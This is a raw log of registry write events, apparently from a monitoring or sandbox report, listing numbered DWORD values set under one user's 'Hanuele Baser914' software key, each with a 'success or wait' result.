5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_235 Dword -866956008 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_236 Dword -21987511 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_236 Dword 1103216476 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_236 Dword 1086507041 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_236 Dword 1103212128 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_237 Dword 1986536689 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_237 Dword -1221584468 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_237 Dword -1238144535 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_237 Dword -1221587032 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_238 Dword 833714729 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_238 Dword 748580738 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_238 Dword 765269681 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_238 Dword 748581104 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_239 Dword 336329569 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_239 Dword -1576218868 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_239 Dword -1559251847 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_239 Dword -1576218056 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_240 Dword 1450916307 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_240 Dword 393947018 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_240 Dword 376985025 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_240 Dword 393950080 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_241 Dword -1492441472 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_241 Dword -1930850930 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_241 Dword -1913982327 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_241 Dword -1930849080 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_242 Dword -2044401595 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_242 Dword 39317225 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_242 Dword 55873617 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_242 Dword 39319056 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_243 Dword -1534356705 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_243 Dword 2009482360 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_243 Dword 1992634649 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_243 Dword 2009487192 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_244 Dword -691285276 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_244 Dword -315317674 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_244 Dword -331882783 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_244 Dword -315311968 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_245 Dword 622301142 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_245 Dword 1654851226 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_245 Dword 1671462825 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_245 Dword 1654856168 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_246 Dword -1314393495 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_246 Dword -669945949 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_246 Dword -653124239 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_246 Dword -669942992 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_247 Dword 1791732400 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_247 Dword 1300221627 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_247 Dword 1283242553 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_247 Dword 1300225144 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_248 Dword 218919577 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_248 Dword -1024577727 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_248 Dword -1007854719 success or wait 1
4 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_248 Dword -1024574016 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_249 Dword -315024547 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_249 Dword 945586422 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_249 Dword 962591049 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_249 Dword 945594120 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_250 Dword 452097285 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_250 Dword -1379197324 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_250 Dword -1396152815 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_250 Dword -1379205040 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_251 Dword 792646110 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_251 Dword 590955602 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_251 Dword 574228441 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_251 Dword 590963096 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_252 Dword 218206243 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_252 Dword -1733829688 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_252 Dword -1717263199 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_252 Dword -1733836064 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_253 Dword -902744067 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_253 Dword 236337984 success or wait 1
4 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_253 Dword 253051497 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_253 Dword 236332072 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_254 Dword 1500990132 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_254 Dword -2088464361 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_254 Dword -2105023695 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_254 Dword -2088467088 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_255 Dword -1855184678 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_255 Dword -118293176 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_255 Dword -101613319 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_255 Dword -118298952 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_256 Dword -28762026 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_256 Dword 1851874398 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_256 Dword 1868705345 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_256 Dword 1851869184 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_257 Dword 347965201 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_257 Dword -472928190 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_257 Dword -489894135 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_257 Dword -472929976 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_258 Dword -1520707624 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_258 Dword 1497240436 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_258 Dword 1480420561 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_258 Dword 1497238160 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_259 Dword -292217203 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_259 Dword -827559734 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_259 Dword -810611303 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_259 Dword -827561000 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_260 Dword -8081029 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_260 Dword 1142610928 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_260 Dword 1159310177 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_260 Dword 1142607136 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_261 Dword -1244080452 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_261 Dword -1182190777 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_261 Dword -1198897111 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_261 Dword -1182192024 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_262 Dword -393520686 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_262 Dword 787976360 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_262 Dword 804579825 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_262 Dword 787976112 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_263 Dword 759346225 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_263 Dword -1536825512 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_263 Dword -1520003399 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_263 Dword -1536823048 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_264 Dword 123638299 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_264 Dword 433354634 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_264 Dword 416756737 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_264 Dword 433345088 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_265 Dword -1315576117 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_265 Dword -1891456102 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_265 Dword -1908288055 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_265 Dword -1891454072 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_266 Dword -1821571859 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_266 Dword 78710527 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_266 Dword 95580817 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_266 Dword 78714064 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_267 Dword 207618125 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_267 Dword 2048880428 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_267 Dword 2065436761 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_267 Dword 2048882200 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_268 Dword 680560945 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_268 Dword -275922888 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_268 Dword -292638431 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_268 Dword -275916960 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_269 Dword -1099308035 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_269 Dword 1694248368 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_269 Dword 1711234793 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_269 Dword 1694251176 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_270 Dword 1939172021 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_270 Dword -630550699 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_270 Dword -613810255 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_270 Dword -630547984 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_271 Dword -536600735 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_271 Dword 1339615600 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_271 Dword 1323015545 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_271 Dword 1339620152 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_272 Dword 359673052 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_272 Dword -985181524 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_272 Dword -1002161471 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_272 Dword -985179008 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_273 Dword -1257867633 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_273 Dword 984983634 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_273 Dword 1001839497 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_273 Dword 984989128 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_274 Dword 2120329052 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_274 Dword -1339801988 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_274 Dword -1322813103 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_274 Dword -1339810032 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_275 Dword -1115720720 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_275 Dword 630364984 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_275 Dword 613541401 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_275 Dword 630358104 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_276 Dword -1177080073 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_276 Dword -1694436557 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_276 Dword -1711044639 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_276 Dword -1694441056 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_277 Dword 2027551139 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_277 Dword 275731784 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_277 Dword 292299945 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_277 Dword 275727080 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_278 Dword 16218237 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_278 Dword -2049065605 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_278 Dword -2065776015 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_278 Dword -2049072080 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_279 Dword 1170792506 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_279 Dword -78900259 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_279 Dword -95460551 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_279 Dword -78903944 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_280 Dword 630165225 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_280 Dword 1891270201 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_280 Dword 1907949697 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_280 Dword 1891264192 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_281 Dword -1386502564 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_281 Dword -433529538 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_281 Dword -416567735 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_281 Dword -433534968 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_282 Dword -1332786171 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_282 Dword 1536635948 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_282 Dword 1519669009 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_282 Dword 1536633168 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_283 Dword -83085119 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_283 Dword -788157703 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_283 Dword -804852519 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_283 Dword -788165992 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_284 Dword 504999344 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_284 Dword 1182005446 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_284 Dword 1198558625 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_284 Dword 1182002144 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_285 Dword -1092088608 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_285 Dword -1142789061 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_285 Dword -1159648407 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_285 Dword -1142797016 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_286 Dword 1854787645 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_286 Dword 827367768 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_286 Dword 810797105 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_286 Dword 827371120 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_287 Dword 965485937 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_287 Dword -1497426738 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_287 Dword -1480824327 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_287 Dword -1497428040 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_288 Dword -2096507432 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_288 Dword 472739125 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H3_288 Dword 489559873 success or wait 1
4 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H4_288 Dword 472740096 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H1_289 Dword 133858836 success or wait 1
5 HKEY_USERS\S-1-5-21-220523388-1935655697-1343024091-1003\Software\Hanuele Baser914 H2_289 Dword -1852059984 success or wait 1
